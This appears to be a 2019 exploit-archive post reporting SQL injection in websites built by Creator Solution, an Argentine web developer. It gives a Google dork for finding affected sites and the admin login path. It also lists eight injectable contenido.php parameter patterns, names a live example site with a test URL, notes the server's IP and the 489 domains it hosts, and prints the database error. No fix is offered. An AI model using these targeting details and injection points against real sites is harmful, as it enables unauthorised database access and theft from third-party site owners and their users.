facebook facebook twitter rss

Desarrollado por Creator Solution Argentina SQL Injection

Author: KingSkrupellos , Published: 18-01-2019
####################################################################

# Exploit Title : Desarrollado por Creator Solution Argentina SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 16/01/2019
# Vendor Homepage : creators.com.ar
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Desarrollado por: Creator Solution" site:ar
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]

####################################################################

# Admin Panel Login Path :
************************

/login.php

# SQL Injection Exploit :
***********************

/contenido.php?tablanom=noticias&indice=IdNoticia&id=[SQL Injection]

/contenido.php?tablanom=estatutos&indice=[SQL Injection]

/contenido.php?tablanom=popular&indice=idpopular&id=[SQL Injection]

/contenido.php?tablanom=historia&indice=[SQL Injection]

/contenido.php?tablanom=documentos&indice=[SQL Injection]

/contenido.php?tablanom=calendario&indice=[SQL Injection]

/contenido.php?tablanom=resultados&indice=[SQL Injection]

/contenido.php?tablanom=reglamentos&indice=[SQL Injection]

####################################################################

# Example Vulnerable Site :
*************************

[+] clubnauticocordoba.com.ar/contenido.php?tablanom=noticias&indice=IdNoticia&id=1'

[ Proof of Concept ] => archive.is/plkpL

Note : (72.29.77.172) => There are 489 domains hosted on this server.

####################################################################

# SQL Database Error :
**********************

You have an error in your SQL syntax; check the manual that
corresponds to your MariaDB server version for the right syntax to use near '' DESC' at line 1

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################

Like us on Facebook :